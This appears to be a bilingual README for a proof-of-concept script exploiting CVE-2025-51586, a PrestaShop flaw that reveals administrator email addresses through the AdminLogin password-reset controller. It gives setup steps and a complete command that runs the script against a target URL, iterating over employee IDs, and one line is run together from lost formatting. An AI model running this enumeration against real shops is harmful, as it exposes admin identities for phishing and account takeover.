
PrestaShop AdminLogin Email Enumeration PoC - CVE-2025-51586. This repository provides an ethical Proof-of-Concept (PoC) for the PrestaShop vulnerability allowing user enumeration through the AdminLogin password reset mechanism. It explains the impact, setup, and usage of the PoC script.
Ce dépôt contient une preuve de concept (PoC) éthique pour la vulnérabilité CVE-2025-51586, affectant PrestaShop versions 1.7.x — 8.2.2.
La PoC énumère les adresses e-mail des administrateurs via le mécanisme de réinitialisation de mot de passe du Back Office (contrôleur AdminLogin).
https://domain.tld/admin/index.php?controller=AdminLogin&reset=1id_employee valide et un reset_token invalide<input name="reset_email" value="[email protected]">Avis officiel : Friends of Presta Security
Signalé par la Friends of Presta Security Team (avis publié le 4 septembre 2025).
Cette PoC est destinée uniquement à des fins éducatives et à des tests autorisés. Utilisez-la uniquement sur des systèmes vous appartenant ou pour lesquels vous disposez d'une autorisation explicite. L'auteur et les contributeurs ne sont pas responsables d'une mauvaise utilisation.
Clonez le dépôt et installez les dépendances :
git clone https://github.com/7h30th3r0n3/CVE-2025-51586-PrestaShop-PoC.git
cd CVE-2025-51586-PrestaShop-PoC
pip install requests beautifulsoup4 rich
python3 cve_2025_51586_enum.py \
-u "https://target/admin/index.php?controller=AdminLogin&reset=1" \
-s 1 -e 100 -m POST -t invalidtoken123 --delay 0.5 --timeout 10 --export results.csv
PoC développée par 7h30th3r0n3. Vulnérabilité découverte par la Friends of Presta Security Team.